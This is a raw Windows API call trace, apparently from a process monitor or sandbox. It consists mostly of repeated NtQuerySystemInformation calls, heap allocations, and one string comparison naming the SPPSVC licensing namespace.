NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd140, Length=0x20, ResultLength=0x0) [0207.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x20, ResultLength=0x0) [0207.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x20, ResultLength=0x0) [0207.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x20, ResultLength=0x0) [0207.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2c0, Length=0x38, ResultLength=0x0) [0207.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd140, Length=0x20, ResultLength=0x0) [0207.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0d0, Length=0x20, ResultLength=0x0) [0207.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0d0, Length=0x20, ResultLength=0x0) [0207.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd390, Length=0x50, ResultLength=0x0) [0207.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd310, Length=0x28, ResultLength=0x0) [0207.306] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0207.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd390, Length=0x50, ResultLength=0x0) [0207.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd390, Length=0x50, ResultLength=0x0) [0207.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd390, Length=0x50, ResultLength=0x0) [0207.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2c0, Length=0x38, ResultLength=0x0) [0207.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x28, ResultLength=0x0) [0207.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x28, ResultLength=0x0) [0207.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x28, ResultLength=0x0) [0207.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd160, Length=0x28, ResultLength=0x0) [0207.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2c0, Length=0x38, ResultLength=0x0) [0207.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0207.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0207.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2c0, Length=0x38, ResultLength=0x0) [0207.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd140, Length=0x20, ResultLength=0x0) [0207.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x20, ResultLength=0x0) [0207.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x20, ResultLength=0x0) [0207.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x20, ResultLength=0x0) [0207.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2c0, Length=0x38, ResultLength=0x0) [0207.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd140, Length=0x20, ResultLength=0x0) [0207.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0d0, Length=0x20, ResultLength=0x0) [0207.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0d0, Length=0x20, ResultLength=0x0) [0207.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.385] GetProcessHeap () returned 0x2026c630000 [0207.385] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63d8e0 [0207.385] GetProcessHeap () returned 0x2026c630000 [0207.385] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d718b40 [0207.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.386] GetProcessHeap () returned 0x2026c630000 [0207.386] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x230) returned 0x2026d6dbfc0 [0207.386] GetProcessHeap () returned 0x2026c630000 [0207.386] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d653060 [0207.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.386] GetProcessHeap () returned 0x2026c630000 [0207.386] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63dd90 [0207.386] GetProcessHeap () returned 0x2026c630000 [0207.387] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d719900 [0207.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd640, Length=0x50, ResultLength=0x0) [0207.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.388] GetProcessHeap () returned 0x2026c630000 [0207.388] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63d8e0 [0207.388] GetProcessHeap () returned 0x2026c630000 [0207.388] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d718b40 [0207.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.389] GetProcessHeap () returned 0x2026c630000 [0207.389] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x230) returned 0x2026d6dc8c0 [0207.389] GetProcessHeap () returned 0x2026c630000 [0207.389] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d6531e0 [0207.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.389] GetProcessHeap () returned 0x2026c630000 [0207.389] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0xe0) returned 0x2026c63d340 [0207.389] GetProcessHeap () returned 0x2026c630000 [0207.389] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x18) returned 0x2026d71a620 [0207.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd640, Length=0x50, ResultLength=0x0) [0207.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd290, Length=0x50, ResultLength=0x0) [0207.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd290, Length=0x50, ResultLength=0x0) [0207.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd290, Length=0x50, ResultLength=0x0) [0207.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x50, ResultLength=0x0) [0207.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x50, ResultLength=0x0) [0207.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x50, ResultLength=0x0) [0207.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x50, ResultLength=0x0) [0207.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x38, ResultLength=0x0) [0207.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x28, ResultLength=0x0) [0207.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x28, ResultLength=0x0) [0207.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x28, ResultLength=0x0) [0207.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x28, ResultLength=0x0) [0207.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf50, Length=0x28, ResultLength=0x0) [0207.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x38, ResultLength=0x0) [0207.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x28, ResultLength=0x0) [0207.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x28, ResultLength=0x0) [0207.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce70, Length=0x20, ResultLength=0x0) [0207.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x20, ResultLength=0x0) [0207.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x20, ResultLength=0x0) [0207.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x20, ResultLength=0x0) [0207.472] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x38, ResultLength=0x0) [0207.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x38, ResultLength=0x0) [0207.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf30, Length=0x20, ResultLength=0x0) [0207.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x20, ResultLength=0x0) [0207.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x20, ResultLength=0x0) [0207.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4e0, Length=0x50, ResultLength=0x0) [0207.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4e0, Length=0x50, ResultLength=0x0) [0207.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4e0, Length=0x50, ResultLength=0x0) [0207.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0207.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0207.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0207.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0207.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0207.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd130, Length=0x28, ResultLength=0x0) [0207.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd130, Length=0x28, ResultLength=0x0) [0207.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd130, Length=0x28, ResultLength=0x0) [0207.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1a0, Length=0x28, ResultLength=0x0) [0207.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0207.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x28, ResultLength=0x0) [0207.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x28, ResultLength=0x0) [0207.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0207.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x20, ResultLength=0x0) [0207.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x20, ResultLength=0x0) [0207.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x20, ResultLength=0x0) 